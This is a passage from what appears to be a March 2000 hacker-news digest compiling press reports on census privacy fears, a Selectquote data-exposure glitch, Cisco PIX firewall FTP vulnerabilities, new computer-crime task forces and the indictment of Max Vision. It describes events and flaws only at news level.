The long form of the US Census has sparked privacy concerns ever since it was introduced in 1960. With the increased awareness of computer security and identity theft those fears are even greater. Some residents fear giving out their personal information on the off chance that it may be stolen or otherwise fall into the wrong hands. The Census Bureau has taken some solace in the fact that it has never suffered a computer related break-in. Philidelphia Inquirer http://www.phillynews.com/inquirer/2000/Mar/21/front_page/PCENSUS21.htm Census queries raising computer-security questions New inquiries strike some as an opening to hackers or invasions of privacy. Bureau officials say fears could reduce responses. By Thomas Ginsberg INQUIRER STAFF WRITER Betty McAdams is afraid computer hackers could steal her personal information. Joe Alessandroni figures marketers somehow will buy his. Entire Web sites question the government's right to the data at all. In the last two weeks, about 15 million Americans began receiving the most intrusive government questionnaire most will ever fill out. The "Long Form" from the U.S. Census Bureau - 37 pages filled with 53 questions about everything from language skills to toilets - is prompting some recipients to squeal about invasion of privacy, a complaint that has arisen every decade since the long form was launched in 1960. This year, however, Census officials and privacy experts said they detect a more pointed fear: concern about computer security. The growth of the Internet since the 1990 Census along with high-profile attacks on Web sites such as Yahoo have exacerbated already-rising concerns about the safety of any information on any computer anywhere. "Alarmed is a good word," said McAdams, 51, of Philadelphia, an assistant director of Greater Philadelphia First, an alliance of business executives in the region. "I assume they're going to compile all this information on a computer somewhere. . . . Probably if [computer hacking] had not happened so recently, I might not be as alarmed." To increasing numbers of people, the country is facing a "privacy Chernobyl," said Robert R. Belair, a Washington-based privacy lawyer and editor of a national newsletter on business privacy. "It doesn't surprise me that the Census Bureau is going to have more trouble this year than before." Unfortunately, some salient facts get lost in the din: The Census Bureau has never suffered a computer-related security breach, experts agree. Its computers are kept separate from other government systems, and respondents' names are separated from personal data when the results are eventually compiled into databases, Census officials say. Moreover, since the 1930s, the Census Bureau, backed by the U.S. Supreme Court, has jealously guarded its records; in 1942, it even rebuffed a demand from the U.S. War Department for information on potential draftees. Census officials, for their part, take the once-a-decade privacy complaints in stride as they collect the statistics for use in redrawing congressional districts and determining federal funding formulas. Questions about household income, for example, are used to estimate the number of subsidized lunches the neighborhood school might have to provide. This year's new question about whether a resident provides primary care for a grandchild is linked to welfare allocations. Maury Cagle, a bureau spokesman, said that even though the agency's confidentiality record is clean, "people have an ingrained suspicion about computers and private information. All of those things add to the falling response rate." The Census Bureau projects its response rate for the 2000 Census will hit its lowest level ever: 61 percent, down from 75 percent in 1980. As the response rate drops, the government has to hire ever more head-counters - "enumerators," in bureau jargon - to brave back streets and barking dogs to get the information personally. This year, the Census Bureau is mounting a $230 million outreach campaign designed to raise the response rate and keep down the expense of enumerators. Still, "people are a little more testy" about giving out personal information than in years past, said Gorden DeJong, director of Pennsylvania State University's Population Research Institute. DeJong and others blame everything: a spate of high-profile computer attacks; rising concerns about confidentiality; a constant if sometimes fluctuating distrust of government; and an ever-widening flood of private surveys and junk mail with which Americans already contend. "For the number of things I get in the mail, I already must be on 50 lists," said Alessandroni, 84, a retired lawyer from Philadelphia. "It's pretty obvious to me that there's no such thing as secrecy. . . . The information is bound to get around." In the last two weeks, either the long form or a separate three-page short form was mailed to 113 million households. An additional 22 million households with incomplete addresses or post office boxes were having their forms hand-delivered. Households that don't return the form by April 1 may get a visit from an enumerator. Every sixth household got a long form. The ratio was set by a scientific sampling formula, and people may not fill out a long form unless they were selected, said Phillip Lutz, assistant regional manager for the Census region comprising Pennsylvania, New Jersey, Maryland, Delaware, and Washington. Each form arrives bearing the bold-faced words: "Your Response is Required by Law." What is not written is the fact that the $100 fine for failing to respond - a fine dating to at least 1954 - apparently has not been imposed in decades, even though federal courts have upheld the constitutionality of the participation law. "We're not interested in fining people. We're interested in collecting information," Lutz said. Still, some people are willing, even eager, to pay the fine rather than give up personal information. "I wrote the number of people living in my house and enclosed a $100 check," said a 41-year-old participant in an Internet chat room about the Census, who spoke on condition that only his first name, Greg, be printed. "Why is it any of their business how I am paying or have paid for my home?" So far, the refusers appear to be in the minority. State and local officials across the country have joined with community and immigrant groups to push for full participation, arguing that the sacrifice pays off in federal funding. Pennsylvania officials have estimated that each person counted in Philadelphia is worth an average of $2,200 in federal funds. "The very people who are not participating need to be counted so they can have government services in their neighborhood," said Kate Kunda, 45, a Spanish teacher from Wayne, Delaware County. As for herself, Kunda added: "I was annoyed that they wanted to know about my electricity bill and mortgage, but we did make an effort to fill it out." @HWA 61.0 HNN:Mar 23rd:Insurance Co. Reveals Personal Info on Web ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse A software glitch allowed visitors to Selectquote.com to view the personal information of the previous visitor. At least 20 users had everything from name and address to current insurance coverage and parents health histories revealed. MSNBC http://www.msnbc.com/news/385464.asp?0m=T12R Insurance site exposes personal data Glitch on Selectquote site reveals information to next user By Mike Brunker MSNBC March 22 � Consumers who requested online life insurance quotes from Selectquote.com on Tuesday and Wednesday got more than they bargained for: Thanks to a software glitch, their personal information was left on the company�s Web site for the next user to see. THE PROBLEM occurred when a form that consumers fill out to request a quote failed to clear the contents at the end of the process. This left everything from the previous user�s name and address to information on current coverage and parents� health histories plainly visible to the next person to request a quote. Lyle Griffin, a spokesman for Selectquote, said the problem occurred when programmers fixed a piece of code on the site that was causing a problem for users with an older version of Internet Explorer. Unfortunately, the fix created a problem in the quote request form, he said. The problem lasted from 4 p.m. PT on Tuesday until about 10 a.m. PT Wednesday, but it affected only about 20 users who were directed to a newly designed Selectquote site that is still being tested, Griffin said. .Not to minimize it,. he said of the problem. .Obviously this is extremely embarrassing.. MSNBC.com was alerted to the problem late Tuesday by a prospective Selectquote customer, who was outraged that other visitors to the site were able to view her personal information. .About 10 minutes (after filling out the form) I got a call from a woman in Ohio who said, �I�m just someone who�s on Selectquote and all your information is prepopulated in the questionnaire,�. said Ona Karasa of Bellevue, Wash. She said she went back on the site Wednesday morning and saw the information of two other people who apparently had just requested life-insurance quotes using the online service. MSNBC editors also were able to access personal information entered by other users until midmorning Wednesday. Another user, Richard Underwood of Rockville, Md., said he was alerted to the problem early Wednesday by e-mail from another Selectquote surfer. He said a company representative had called and left a message concerning his request for a quote, but did not mention the Web site problem. .Truthfully, I don�t know if I want to talk to anyone at Selectquote about life insurance at this point,. he said. Underwood said the experience would likely make him pause the next time he is prompted to enter personal information on a Web site. .I was just getting to the point where I was reasonably comfortable doing that, but I may have to think twice if this is how it works,. he said. @HWA 62.0 HNN:Mar 23rd:Cisco Admits to Big Hole in PIX Firewall ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse Last week Cisco admitted that it is possible to fool the PIX stateful inspection into opening up arbitrary TCP ports, which could allow attackers to circumvent defined security policies. The vulnerabilities effect any PIX firewall that has enabled FTP which is turned on by default. Vnunet http://www.vnunet.com/News/601083 Networking � John Leyden, Network News [22 Mar 2000] Cisco admits to serious PIX firewall flaw Cisco last week admitted that two security vulnerabilities affecting its PIX firewalls could leave corporate networks open to attack. In an interim security notice, the vendor acknowledged the existence of two related vulnerabilities that both cause its Secure PIX Firewalls to interpret FTP (File Transfer Protocol) commands out of context, leaving the networks behind the firewalls open to penetration. Cisco said that in certain configurations "it is possible to fool the PIX stateful inspection into opening up arbitrary TCP ports, which could allow attackers to circumvent defined security policies". All Cisco Secure PIX Firewalls with software versions up to and including 4.2(5), 4.4(4), and 5.0(3), that are configured to provide access to FTP services, are at risk from both vulnerabilities. Cisco admitted that the problem means any Cisco Secure PIX Firewall that has enabled the fix-up protocol FTP command could allow unauthorised data to reach the network it is designed to protect. Deri Jones, managing director of security tester NTA Monitor, described the issue as "serious", particularly because Cisco's offering is currently the third most popular firewall in the market. "To Cisco's credit it has issued a bulletin, but has not yet found any solutions. This will not be trivial to address and may take it some time," warned Jones. Clive McCafferty, managing director of security consultant CenturyCom, said that many users, which include BT, use Cisco's PIX firewalls for managed services. "This could allow an attacker to send spurious stuff and then launch an attack when a port is open," said McCafferty. The first vulnerability, which remains unfixed, is exercised when a client inside the firewall browses to an external server and selects a link that the firewall interprets as two or more FTP commands. The client begins an FTP connection as expected, and at the same time unexpectedly executes another command opening a separate connection through the firewall. The only solution Cisco currently suggests for this problem is disabling incoming FTP services. Any server that permits internal clients to make arbitrary outbound FTP connections may be vulnerable to this issue. The second, related problem is exercised when the firewall receives an error message from an internal FTP server containing an encapsulated command that the firewall interprets as a distinct command. This can be exploited to open a separate connection through the firewall. Both vulnerabilities are due to the command fix-up protocol FTP (portnum), which is enabled by default on the Cisco Secure PIX Firewall. To exploit the security flaws, attackers must be able to make connections to an FTP server protected by the PIX Firewall. � If you would like to comment on this article email us @ newseditor@vnunet.com @HWA 63.0 HNN:Mar 23rd:College To Offer Online Crime Fighting Courses ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lew A new state-of-the-art computer lab was unveiled by officials at the College of DuPage in Illinios on Monday at the college's Suburban Law Enforcement Academy. The lab will offer police officers (no civilians allowed) courses in reconstructing an electronic crime scene, as well as how to present such evidence in court. The lab, valued at $250,000, was donated by Microsoft Corp. and Omni Tech Corp. Chicago Tribune - Registration Required http://chicagotribune.com/news/metro/dupage/article/0,2669,SAV-0003210202,FF.html @HWA 64.0 HNN:Mar 23rd:Pittsburgh Gets Computer Crime Task Force ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse and Evil Wench A joint operation of federal and local authorities named the Pittsburgh High Tech Computer Crimes Task Force will try to help in the fight against cyber crime. The Task Force was announced on Tuesday at the Pittsburgh FBI offices. Pittsburgh Tribune http://www.triblive.com/digage/dfbi0323.html Pittsburgh Post Gazette http://www.post-gazette.com/regionstate/20000322cybercrime1.asp Tribune; FBI installs new task force aimed at fighting cybercrimes By Erik Siemers TRIBUNE-REVIEW The aqua Macintosh G3 computer, its electronic guts exposed, appeared harmless as it sat on a table in the Pittsburgh FBI offices Tuesday. But its hard drive tells investigators a different story - it was used to print counterfeit corporate checks. That Macintosh is one of the computers under examination by the Pittsburgh High Tech Computer Crimes Task Force. The medley of federal and local authorities trained to investigate computer-related crimes was unveiled yesterday The task force, one of the first in the nation, pools experts from local agencies such as Pittsburgh police with federal agencies such as the Secret Service and the Internal Revenue Service into one room to combat the rapid growth of cybercrimes. "Crimes we couldn't have conceived years ago are now routine," said U.S. Attorney Harry S. Litman, whose office is involved in the task force. "It is critical that we respond to these crimes by marshaling our resources." Western Pennsylvania is open to crimes such as hacker attacks and "a whole array of Internet fraud," partly because it has more software development firms than Silicon Valley, Litman said. "Our position poses significant vulnerability to cybercrimes," Litman said. The task force will be free to use each agency's resources along with those at Carnegie Mellon's Computer Emergency Response Team, said Richard D. Pethia, manager of CERT's networked systems survivability program. CERT will provide technical assistance to the task force, Pethia said. Each agency offers one representative to the task force who has been trained in forensic examinations of computers, said Dan Larkin, supervisor in charge of the FBI's White Collar and Computer Crimes Division. Aside from providing intelligence and technical assistance to computer investigations, the task force will focus on investigations where the Internet was used as the main tool in committing the crime. Michael Vatis, director of the FBI's National Infrastructure Protection Center in Washington, D.C., said all FBI field offices will eventually house task forces similar to Pittsburgh's. Pittsburgh is one of the initial task force sites partly because "we have a wealth of talent," said John P. Joyce, assistant special agent in charge of the FBI's Pittsburgh office. The city also has a good track record for law enforcement agencies working with each other and with Carnegie Mellon's technology resources, said FBI Special Agent Bill Crowley. Task force members will use traditional investigation skills along with advanced knowledge of technology to crack computer cases, said Vatis. "We need to have the technology to get the digital evidence," Vatis said. Getting that digital evidence can be as simple as copying the contents of the hard drive for analysis on its own computers, said Special Agent Tom Hyslip, the Secret Service's representative to the task force. "When we go to court we can say we never touched (the evidence)," Hyslip said. -=- Gazette; City at forefront of war on cybercrime FBI forming task forces to fight crimes of Internet age Wednesday, March 22, 2000 By Torsten Ove, Post-Gazette Staff Writer With its aging population and Rust Belt image, Pittsburgh may hardly seem like the kind of town the federal government would choose as a base for its war on sophisticated cybercrime. But yesterday, as local law enforcement officers stood stiffly for the cameras at FBI headquarters Downtown, authorities announced the creation of the nation's first task force specifically designed to combat computer intrusion, Web site vandalism, on-line espionage and other crimes of the rapidly evolving Internet age. "This is the future, but it is also very much the present," said Michael Vatis, the FBI's top cybercop. "This is putting Pittsburgh at the cutting edge of cybercrime prevention." The task force, comprised of federal, state and local agencies, is one of 16 planned nationwide in major cities. Pittsburgh was chosen because of the prevalence of software development companies here and the presence of Carnegie Mellon University's Computer Emergency Response Team, the nation's leading cybercrime research facility. In addition to focusing on complex computer and Internet crimes, FBI officials said the local task force will provide technical assistance to police departments in investigations of fraud, child pornography and identity theft that involve computers. Vatis, director of the National Infrastructure Protection Center in Washington, D.C., said computers are changing the face of crime so quickly that law enforcement agencies have to work together to keep up. In addition to working to combat large-scale attacks such as the one that disabled Yahoo!, eBay and other e-commerce Web sites last month, federal authorities have been scrambling to head off all manner of computer crimes, from organized hacking of government computers by suspected foreign agents to amateur vandalism such as that committed by the teen-ager who vandalized an anti-drug Web site with pictures of Beavis and Butthead. Locally, FBI Special Agent John P. Joyce said his agency is investigating 30 to 40 cases of computer intrusion and similar crimes, although he wouldn't reveal details of any of them. Because of their technical nature, each investigation requires much more expertise than the traditional capers tackled by FBI agents of old. The new breed of federal crime fighter is more likely to be an agent sitting at a computer all day than a suit-and-tie swashbuckler with a gun kicking down doors. "These cases are a lot more complicated than physical crime," said Vatis, "and they take a longer time to solve." Richard D. Pethia of CMU's CERT warned that the "denial of service" attacks that knocked the Internet companies off-line in February are only the beginning of new waves of cyberspace assaults. In 1998, he said, his center examined 4,000 incidents. Last year, the number reached 8,000. This year, it could double again. "This problem is real and it's here," he said. "The nasty thing about computer attacks is that they can be launched from anywhere on the planet." And it can be nearly impossible to track down the culprits and then prove they are responsible for specific on-line exploits. The attacks on the e-commerce companies, for example, remain unsolved, although Vatis said the FBI is making progress in the case. Not everyone is convinced the federal government, working with experts in the private sector, has what it takes to match wits with serious hackers bent on mayhem. "If I were a cyber criminal with the FBI after me, I would sleep like a baby," said Jay Valentine, president of InfoGlide Corp., an Internet security company, in a recent Scripps Howard report about Internet security. "Even a blind squirrel finds a nut, but the FBI will only catch amateurish hackers. The best ones are a generation ahead of the FBI." Other critics have blasted the FBI and the National Infrastructure Protection Center for reacting too slowly to the attacks on 30 university systems last year that laid the groundwork for the e-commerce shutdown last month. In a USA Today report, experts -- many of them cybersleuths selling their services -- also said the government's efforts were hindered by inter-agency squabbling and the fact that some companies don't trust the FBI enough to share information with agents. Vatis wouldn't address the USA Today report except to say that it was inaccurate. Regarding the charge of slow government reaction, he said the protection center issued a warning about the denial-of-service threat in plenty of time. The National Infrastructure Protection Center's Web site shows the warning went out on Dec. 30 and included detailed information about what defensive steps to take. Still, Vatis acknowledged that government agencies are "still in the process of getting up to speed." @HWA 65.0 HNN:Mar 23rd:Business May Be Protected Against FOIA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse To encourage companies to release information about online attacks a new bill would provide firms with an exemption to the Freedom of Information Act. Representatives Tom Davis, R-Va. and Jim Moran, D-Va. plan to introduce the bill later this week. It is hoped that this exemption will promote the reporting of cyber attacks by industry. (And at the same time erode citizens rights.) Newsbytes http://www.newsbytes.com/pubNews/00/146086.html Bill Would Protect Firms That Share Hacking Info By David McGuire, Newsbytes WASHINGTON, DC, U.S.A., 21 Mar 2000, 6:00 AM CST A new bill aimed at encouraging companies to share information about hacker attacks would provide firms with a limited exemption from the Freedom of Information Act (FOIA). Set to be introduced by Reps. Tom Davis, R-Va. and Jim Moran, D-Va., later this week, the legislation would allow companies to share information about cyberattacks with law enforcers and industry groups, without worrying that such information could come back to haunt them, Davis staffer David Marin said today. "The public interest will be served by companies coming forth to share their information" about attacks, Marin said. Too often now companies do not report cyberattacks for fear that such reports will find their way into the media, he said. While the bill would create a limited shelter under FOIA, it is not intended to allow companies to mask their business dealings, Marin said. When the legislation is completed it will be "narrowly tailored to address (information pertaining to) how the attack was done and what was done to fix the attack," Marin said. The legislation will apply only to telecommunications and information technology infrastructure attacks. Used primarily by the media, FOIA allows members of the press and the public to file legally binding requests for public documents. FOIA already contains an exemption for ongoing criminal investigations, by Davis and Moran are aiming to further protect firms that divulge information about cyberattacks, Marin said. Reported by Newsbytes.com, http://www.newsbytes.com . @HWA 66.0 HNN:Mar 23rd:Teenagers To Receive Deterrent Sentences ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse After selling stolen logon names and passwords three teenagers in Hong Kong were warned by Magistrate Ian Candy that they faced deterrent sentences. The three plead guilty to a total of 49 charges including the downloading and selling of music files. Sentencing has been scheduled for April 5th. South China Morning Post http://www.technologypost.com/features/Daily/20000322105804432.asp?Section FEATURES Teen hackers face deterrent sentences ELAINE PAK LI Three teenage computer hackers were warned yesterday that they faced deterrent sentences after they admitted selling login names and passwords stolen from the Internet in the first case of its kind in Hong Kong. One of the trio, a student, was also convicted of downloading songs from the Internet and selling them for profit. At Eastern Court, restaurant manager Tam Hei-lun and clerk Po Yiu-ming, both 19, and student Mak King-lam, 18, pleaded guilty to a total of 49 charges. Magistrate Ian Candy remanded them in custody for sentencing on April 5, pending reports, and said: "It is precisely these kind of computer crimes which leave Internet users in fear and make them pause before conducting even the most basic of transactions. "These criminal activities should be nipped in the bud and a deterrent sentence must be imposed." All the offences took place between March 1998 and May last year. David Leung, prosecuting, told the court Po had hacked into other Internet users' computers and unlawfully obtained 127 login names and passwords given to Internet users when they subscribe to an Internet service provider for a monthly fee and an hourly rate. The three defendants knew each other through the Internet and Po had sold some of his illegally obtained login names and passwords to Tam for $3,000, but gave others for free to Mak. Tam later resold them for $1,500. The three were aware that the information they obtained was acquired illegally, the magistrate was told. Mr Leung said the three defendants had hacked into the accounts of Internet users of Hongkong Telecom IMS Netvigator, Vision Network Ltd, City Telecom (HK), Netfront Information Technology and ABC Net, saving themselves the monthly fees and causing losses to the account holders. Tam admitted 14 counts of obtaining access to a computer with a view to dishonest gain, Po admitted 12 and Mak two. Mak also admitted 10 charges of selling pirated discs, in which he downloaded songs from the Internet and sold 200 discs from his own Web site. Each disc contained 100 songs and was priced at $88. Tam, who asked buyers of the logins to deposit money into his bank account, also admitted eight counts of dealing with property known or reasonably believed to represent proceeds of an indictable offence. Po admitted a further three charges of criminally damaging the computers of three users. @HWA 67.0 HNN:Mar 24th:2600 Retains Big name Attorneys - Trial Date Set ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Macki Martin Garbus, an internationally distinguished New York attorney, and his firm (Frankfurt, Garbus, Klein, and Selz) have been retained by the defense in the New York MPAA DeCSS case. Two of the three defendants have withdrawn under consent agreements, leaving only 2600 Magazine and its publisher Emmanuel Goldstein, as defendant. A trail date has been set for December 5, 2000. 2600 Electronic Frontier Foundation - They are providing funding, please show your support! http://www.2600.com/news/2000/0324.html http://www.eff.org TRIAL DATE SET IN DECSS CASE - WORLD RENOWNED LEGAL TEAM TAKES CASE 03/24/00 The importance of the fight against the MPAA and the DVD Copy Control Association was underlined this week with the hiring of the legal team of Frankfurt, Garbus, Klein, and Selz to represent 2600. Martin Garbus, who will be the key lawyer on our side, has defended the likes of Lenny Bruce, Spike Lee, Samuel Beckett, Andrei Sakharov, and Vaclav Havel and is the author of "Tough Talk," published in 1998. He is a renowned First Amendment attorney and, thanks to funding from the Electronic Frontier Foundation, we have him in our court. Please show your support to the EFF for taking on this important case and help them to play a key role in whatever cases come up in the future. We've already seen a significant development this week as we have been granted the time we need to build our defense. The court was prepared to start the trial on May 1st which is what the plaintiffs wanted. After presenting our arguments, we were given a court date of December 5th. This is a very good development for us as there is much to be prepared. An uninformed court would have been bad for all of us. As the weeks and months progress, we will be in need of expert witnesses and testimony supporting our position. Your help and support will be invaluable as always. We will keep you updated as events progress. @HWA 68.0 HNN:Mar 24th:Max Vision Indicted in San Jose ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre A suspect involving computer break-ins at NASA and the U.S. departments of energy, defense and transportation was indicted in San Jose on Wednesday. the indictment of Max Vision (Max Ray Butler) of Berkeley included charges of unauthorized access of a computer, recklessly causing damage and interception of electronic communication for a total of 15 counts. Max Vision was previously an FBI informant who turned himself in on Tuesday. Associated Press - via Yahoo http://dailynews.yahoo.com/h/ap/20000323/us/hacker_indicted_1.html Wednesday March 22 11:56 PM ET Suspected Gov't Hacker Indicted SAN FRANCISCO (AP) - A suspected computer hacker made his first court appearance Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, said federal prosecutors. Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during the hearing in San Jose. On March 15, he was indicted on 15 criminal counts, including unauthorized access of a computer, recklessly causing damage and interception of electronic communication. All the counts carry sentences of at least six months and fines of hundreds of thousands of dollars. Butler, who also goes by the name of Max Vision, had been an FBI source, helping agents solve computer crimes, authorities said. He turned himself in on Tuesday. Butler's attorney did not return a telephone call seeking comment. -=- More: (SfGate) http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/24/MN57003.DTL FBI Computer Expert Accused of Hacking Henry K. Lee, Chronicle Staff Writer Friday, March 24, 2000 Max Ray Butler seemed to be at the top of his game. For two years, the computer expert was a confidential source for an elite FBI computer crime squad, helping to ferret out scofflaws on the Internet. Butler, also known as Max Vision, was also a self-described ``ethical hacker'' from the Silicon Valley who boasted that he could test the security of any computer system by penetrating it. But Butler's cyber activity went too far, federal authorities say. Butler, 27, of Berkeley appeared in federal court in San Jose yesterday on a 15-count federal indictment charging him with hacking into computers used by the University of California at Berkeley, national laboratories, federal departments, air force bases across the country and a NASA flight center. Butler posted $50,000 cash bail yesterday after U.S. Magistrate Judge Patricia Turnbull ordered him not to use computers except for work. Butler and his attorney, Jennifer Granick of San Francisco, could not be reached for comment. The indictment, handed down March 15, said Butler caused ``reckless damage'' as a result of intrusions in May 1998. Butler was also charged with possession, with intent to defraud, of 477 passwords belonging to customers of a Santa Clara- based Internet service provider. The case underscores the potential risks involved when law-enforcement agencies use confidential informants with access to sensitive information. ``Sources are often very close to criminal activity, and sometimes they cross the line,'' said Special Agent George Grotz, an FBI spokesman in San Francisco. Grotz declined to say how Butler became an FBI informant and whether he was a federal source at the time of the alleged crimes. Grotz said Butler is no longer associated with the agency. Friends of the suspect told the Associated Press that Butler was caught possibly violating the law several years ago and began working with the FBI to avoid charges. Seth Alves, 27, told the news agency that Butler was unfairly targeted after refusing to comply with an FBI request. A 22-month investigation by the FBI and military investigators ended Tuesday morning when federal agents converged on a home on Dwight Way near the UC Berkeley campus, where Butler lives with his his 23-year-old wife, Kimi Winters. No one answered the door. Butler turned himself in to the FBI in Oakland later that day. Butler grew up in Idaho and lived with his family in Washington, where authorities said he has a 1997 misdemeanor conviction for attempted trafficking of stolen property. He developed a proficiency with computers, eventually attracting the attention of the FBI's Computer Crime Squad, which used him as a confidential informant. An FBI search warrant affidavit said Butler was ``well known'' to squad members and ``has provided useful and timely information on computer crimes in the past.'' In 1997, Butler started a company known as Max Vision in Mountain View, specializing in ``penetration testing'' and ``ethical hacking'' procedures in which he would simulate for clients how a hacker would penetrate their computer systems, according to the company Web site. ``Our client penetration rate is currently 100 percent,'' the site said, with recent clients including a large consortium of telecommunications companies, a major motion picture company and an e-commerce online auction service. By 1998, Butler was living with Winters in a one-story San Jose apartment, where the couple started up their own Web-design company, Kimi Networks, records show. Reached by telephone yesterday, Winters hung up on a Chronicle reporter. It was also from that apartment, according to the FBI, that Butler hacked into computers by using a computer software vulnerability known as a buffer overflow, which sends commands into a system that ordinarily would not be allowed. Butler also allegedly invaded computers used by the Lawrence Berkeley National Laboratory. Vern Paxson, a computer scientist at the lab, noticed an online intruder conducting unauthorized scans of laboratory and UC Berkeley computers in May 1998 and used a monitoring device that later helped identify the source of the intrusions. Paxson said yesterday that Butler's arrest was ``somewhat ironic'' but ``not totally surprising.'' Paxson said a person later identified as Butler even sent him an apologetic e-mail a day after the computer intrusions. Butler also somehow obtained a confidential incident report Paxton had filed about the invasions, Paxson said. @HWA 68.1 KYZSPAM: More on Max Vision. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: Dragos (email) Further info from Dragos Ruii and the Kyxspam world domination conspiracy url: http://www.mediacentral.com/channels/allnews/03_23_2000.reutr-story-N23354790.html Ex-FBI source charged with hacking SAN JOSE, Calif., March 23 (Reuters) - A man officials say was once a confidential FBI source on computer hackers has been charged with allegedly breaking into computer systems belonging to NASA, the military and the U.S. departments of energy, defense and transportation, the U.S. Attorney's office said. Max Ray Butler, 27, also known as Max Vision, was due to appear in court on Thursday to face charges of breaking into and damaging computers as well as possessing the passwords of customers of California Internet service provider Aimnet. The indictment's 15 counts carry fines ranging from $5,000 up to $250,000 and jail terms totaling more than 50 years in prison, said officials at the U.S. Attorney's office in San Francisco. A Federal Bureau of Investigation affidavit filed to support a search of his home showed Butler, of Berkeley, Calif., was a confidential source for FBI agents tracking computer crimes before authorities began their 22-month investigation of him in May 1998. Butler, being held in lieu of $100,000 bond, surrendered on Tuesday to authorities in Oakland. He was scheduled to attend a bail review hearing on Thursday in U.S. District Court in San Jose. The arrest comes amid growing concern over a number of recent high-profile computer hacker attacks. But authorities said there is no connection between Butler and the "denial-of-service" attacks in early February that temporarily cut off customers to some of the Web's biggest sites, including Yahoo!, eBay , Amazon.com and E-Trade. "There are no allegations related to denial-of-service attacks but we would characterize this as a serious case," said U.S. attorney Ross Nadler, chief of the office's newly created Computer Hacking and Intellectual Property unit. Lawyers for Butler could not be reached for comment. The FBI, the U.S. Air Force, NASA and the U.S. Navy began an investigation after several U.S. Air Force computer systems around the country were attacked in May 1998, although it was unclear when Butler became their focus. Butler is accused of hacking into computers belonging to the U.S. Department of Energy's Argonne National Laboratories in Illinois and the Brookhaven National Laboratory in New York; NASA's Marshall Flight Center in Alabama; the office of the Secretary of Transportation in Washington, D.C.; the office of the Secretary of the Department of Defense in Washington, D.C.; and unspecified facilities of the Department of Defense, and IDSoftware of Mesquite, Texas. � 2000 Reuters Limited. All rights reserved. -=- From: Dragos Ruiu To: <*> Sent: Thursday, March 23, 2000 2:51 PM (Hmmm.... thanks Ken for the head's up. I am also in agreement: I don't know any of the details of the incident, but I do know that Max has been a valuable resource and has contributed enormous amounts of effort and knowledge to the entire computer security field. I hope that alone is of some mitigating consideration... --dr) Berkeley man indicted, charged with hacking government computers Copyright � 2000 Nando Media Copyright � 2000 Associated Press From Time to Time: Nando's in-depth look at the 20th century SAN FRANCISCO (March 23, 2000 8:20 a.m. EST http://www.nandotimes.com) - A suspected computer hacker appeared in court for the first time Wednesday after being indicted on charges of breaking into computers belonging to NASA and the U.S. departments of energy, defense and transportation, federal prosecutors said. Max Ray Butler, 27, of Berkeley was ordered held on $100,000 bail during the hearing in San Jose. On March 15, he was indicted on 15 criminal counts, including unauthorized access of a computer, recklessly causing damage and interception of electronic communication. All the counts carry sentences of at least six months and fines of hundreds of thousands of dollars. Butler, who also goes by the name of Max Vision, had been an FBI source, helping agents solve computer crimes, authorities said. He turned himself in Tuesday. Butler's attorney did not return a telephone call seeking comment. -- dursec.com / kyx.net - we're from the future http://www.dursec.com learn kanga-foo from security experts: CanSecWest - May 10-12 Vancouver Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org, RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com -=- From: Dragos (I guess one of the interviews on radio ran this morning. This showed up on a local (MyBC) news page too, funny... I don't remember giving that quote to them. But out of all the negative light they could have shone I'm happy with the way it was handled. --dr) url: http://www2.mybc.com/bc/news/fs.cfm?id=172752 Friday , Mar 24, 2000 Guest speaker busted VANCOUVER (CKNW/AM980) -- An expert on Internet security who was scheduled to speak at a Vancouver conference has been arrested by the FBI. Max Butler is charged with hacking into computers and destroying information. One of the organizers of the local conference, Dragos Ruiu of Dursec-dot-com, says that Butler was very well known among those in the information technology sector. "He ran an intrusion database, kind of like a big listing of signatures that people use towatch for hackers intruding into their network, and it was quite a famous data base," said Ruiu. "Lots of Fortune 500 companies and big sites use his database as a way of protecting their networks." Ruiu is now scrambling to find a replacement for Butler. The conference runs May 10-12. -=- @HWA 69.0 HNN:Mar 24th:Koreans Attempt to Learn Security Secrets ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Apocalyse Dow The Korean Advanced Institute of Science and Technology (KAIST) will conduct a 'hacking contest'. the contest is set to start in June and will offer 100 Million Won in prize money for defeating a firewall. (If they really expect to get anything out this other than publicity they are sadly mistaken.) Chosun http://www.chosun.com/w21data/html/news/200003/200003220527.html KAIST to Hold Hackers Contest An international hacking contest will be held under the auspices of the Korean Advanced Institute of Science and Technology (KAIST) it was announced Wednesday. The Information Protection Education Research Center of the institute which formally opened the same day said that it will inject W300 million to host the First World Information Protection Contest (WIPC) in June. The contest will have hackers attempt to break into a firewall the center has built. A total of W100 million prize money is prepared for the event, which aims to find out the international standard of hackers and to test the capacity of Korean information protection technology. (Sim Jae-yool, jysim@chosun.com) @HWA 70.0 HNN:Mar 24th:Rack Mount Your iMac ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Found on Slashdot This has been posted elsewhere it is just to cool 